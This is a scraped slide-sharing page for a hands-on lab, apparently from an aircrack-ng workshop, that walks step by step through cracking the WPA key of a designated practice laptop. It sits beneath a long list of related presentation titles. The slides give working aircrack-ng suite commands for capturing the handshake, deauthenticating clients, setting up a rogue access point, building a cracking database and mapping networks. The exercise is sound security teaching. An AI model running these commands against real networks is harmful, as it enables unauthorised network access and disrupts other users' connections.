1 Practical stuff Crack the WPA key of this laptop. SSID: « Philips WiFi » Password list and cowpatty table available on CD (only useful today).

Slides:



Advertisements
Similar presentations
Brute Force Attack Against Wi-Fi Protected Setup
Advertisements

Security+ All-In-One Edition Chapter 10 – Wireless Security
Overview How to crack WEP and WPA
Home Wireless Security David Mitchell 12/11/2007.
Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
DSL-2730B, DSL-2740B, DSL-2750B.
ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge.
Wireless Cracking By: Christopher Zacky.
SHARKFEST ‘10 | Stanford University | June 14–17, 2010 Wireless Security June 16, 2010 Thomas d’Otreppe de Bouvette Author of Aircrack-ng SHARKFEST ‘10.
Hacking Exposed 7 Network Security Secrets & Solutions
Cracking AT&T U-verse Default WPA1/2 Passwords.
Crack WPA Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
WLAN Security: Cracking WEP/WPA
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
1 MD5 Cracking One way hash. Used in online passwords and file verification.
The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.
 Any unauthorized device that provides wireless access  Implemented using software, hardware, or a combination of both  It can be intentional or unintentionally.
Wireless Attacks. Set up the APs Computer IP: Subnet Mask: Router IP address: –
Agenda 10:00 11:00 Securing wireless networks 11:00 11:15 Break 11:15 12:00Patch Management in the Enterprise 12:00 1:00 Lunch 1:00 2:30 Network Isolation.
CMGT/441 Intro. to Information Systems Security Management Information Technology University of Phoenix Kapolei Learning Center Week #4 1 Hacking Wireless.
Computer Networks. Network Connections Ethernet Networks Single wire (or bus) runs to all machines Any computer can send info to another computer Header.
What Password Cracking Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer.
Chapter Network Security Architecture Security Basics Legacy security Robust Security Segmentation Infrastructure Security VPN.
Ethical Hacking Defeating Wireless Security. 2 Contact Sam Bowne Sam Bowne Computer Networking and Information Technology Computer Networking and Information.
Wireless Network Security Dr. John P. Abraham Professor UTPA.
Implementing Wireless and WLAN Chapter 19 powered by DJ 1.
Learningcomputer.com SQL Server 2008 Configuration Manager.
Wireless Networking Concepts By: Forrest Finkler Computer Science 484 Networking Concepts.
Environment => Office, Campus, Home  Impact How, not Whether A Checklist for Wireless Access Points.
1. Insert the Resource CD into your CD-ROM drive, click Start and choose Run. In the field that appears, enter F:\XXX\Setup.exe (if “F” is the letter of.
Copyright Security-Assessment.com 2005 Wireless Security by Nick von Dadelszen.
Wireless Encryption: WEP and cracking it. Eric Shea.
Wireless II. Frames Frames – Notes 3 Frame type ▫Management  Beacons  Probes  Request  Response  Associations  Request  Response  Disassociate.
Hands-On Ethical Hacking and Network Defense Lecture 14 Cracking WEP Last modified
CS 525M – Mobile and Ubiquitous Computing Seminar Bradley Momberger Randy Chong.
CNIT 124: Advanced Ethical Hacking Ch 7: Capturing Traffic.
Wireless Security on the Philippine Setting. Introduction: WHOAMI What’s this all about?
Distributed WPA Cracking CSCI Distributed Systems Spring 2011 University of Colorado Rodney Beede Ryan Kroiss Arpit Sud
Wireless Security A lab that actually works! Anne Hewitt Oscar Salazar A lab that actually works! Anne Hewitt Oscar Salazar.
KSU 2015-Summer Cyber Security | Group 1 | Seul Alice Bang Get a Wifi Password.
Information Security 493. Lab # 4 (Routing table & firewalls) Routing tables is an electronic table (file) or database type object that is stored in a.
Wireless Security John Himmelein Erick Andrew Christian Adam Varun Bapna.
Cracking WPA/WPA2 in the Cloud
WPA Cracking with Rainbow Tables For Educational Purposes Only Kurt Wondra November 18 th, 2010  1) Scanning for Vulnerable Networks  2) Capturing Usable.
Wireless Hacks A Valpo Hacks Presentation May 2016.
COMP2322 Lab 1 Introduction to Wireless LAN Weichao Li Apr. 8, 2016.
1 Philips EvoKit Lumen Selection App User Manual * Philips Lighting April 20, 2016 *Can be used for Philips EvoBase as well.
How to Use LINCWorks as a Wireless Repeater For additional help please contact: Paul Peterson
Module 48 (Wireless Hacking)
Re-evaluating the WPA2 Security Protocol
OSA vs WEP WPA and WPA II Tools for hacking
Advanced Penetration testing
Wireless II.
Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00
Presented By: Rohit Maurya
We will talking about : What is WAP ? What is WAP2 ? Is there secure ?
Securing A Wireless Network
Practical stuff Crack the WPA key of this laptop (SSID: « Philips WiFi »). Rules: Do not attack anything else on this laptop. You can use aircrack-ng but.
Advanced Penetration testing
Only For Education Purpose
Wireless Hacking.
Advanced Penetration testing
WEEK 1.
Hacking Wi-Fi Beyond Script Kiddie and WEP
Advanced Penetration testing
Advanced Penetration testing
Advanced Penetration testing
Breaking into Wi-Fi Networks
WPA Cracking && Hashcat.
Presentation transcript:

1 Practical stuff Crack the WPA key of this laptop. SSID: « Philips WiFi » Password list and cowpatty table available on CD (only useful today).

2 Practical stuff - Tips Make sure to disable all network managers and other programs using wireless interfaces: –airmon-ng check kill Madwifi-ng –airmon-ng stop ath0 –airmon-ng start wifi0 If you don’t see the handshake with aircrack-ng (or any other tool), open your capture file with wireshark and filter it with « eapol ».

3 Steps 1.Get the handshake With the AP Without the AP 2.Create airolib-ng database 3.Crack the handshake

4 Get the handshake – With AP Start airodump-ng to find the channel of the AP: airodump-ng INTERFACE Make sure a client is connected. If there are none, you won’t be able to get the handshake When you have the channel, stop the previous instance (Ctrl-C) and start it again on the channel of the AP (and save packets): airodump-ng –c AP_CHANNEL –w philips-capture INTERFACE Open a new terminal and deauthenticate the client: aireplay-ng –deauth 1 –a BSSID –c CLIENT_MAC INTERFACE If you didn’t get it, try again without specifying the client MAC (some drivers prefer broadcast deauth): aireplay-ng –deauth 1 –a BSSID INTERFACE

5 Get the handshake – Without AP Start airbase-ng –WPA-PSK (TKIP) –SSID: Philips WiFi –Do not answer to any other probe request –Channel 6 –Save packets into philips-capture airbase-ng -z 2 -W 1 -e “Philips WiFi” –y -c 6 –F philips-capture rausb0 Notes: I’ll do this; Everybody doing it at once may not give the expected result :) However, you can start airodump-ng on channel 6: airodump-ng –c 6 –w philips-capture INTERFACE A bug in madwifi-ng prevent it from working correctly with airbase-ng

6 Creating airolib-ng database Since a cowpatty table already exist, we’ll use it with airolib-ng: –Output database: philips_airolib –Import cowpatty file "Philips WiFi" airolib-ng philips_airolib --import cowpatty "Philips WiFi"

7 Crack the handshake Use aircrack-ng to crack the key: –Capture file: philips-capture-01.cap Using airolib-ng database: aircrack-ng –r philips_airolib philips-capture-01.cap Using a wordlist: aircrack-ng –w passphrases.txt philips-capture-01.cap

8 Practical stuff - Airgraph-ng Creates a picture of the wireless networks Wardriver or just want to monitor your network, this is for you.

9 Practical stuff - Airgraph-ng (2)

10 Practical Stuff – Aigraph-ng (3) Run airodump-ng with the parameters you want (however -w is mandatory to make it work). Airodump-ng writes the CSV file every 5 seconds. Whenever you want, start airgraph-ng on the CSV file.

11 Practical stuff - Airgraph-ng (4) Parameters: –Input file: Airodump-ng CSV file (.txt) –Graph type: CAPR (Client – AP Relationship): Connected clients CPG (Common Probe Graph): Probed SSID –Output file: Picture file name Examples: –CAPR: airgraph-ng.py -i../airgraph-01.txt -t CAPR -o../airgraph-capr.png –CPG: airgraph-ng.py -i../airgraph-01.txt -t CPG -o../airgraph-cpg.png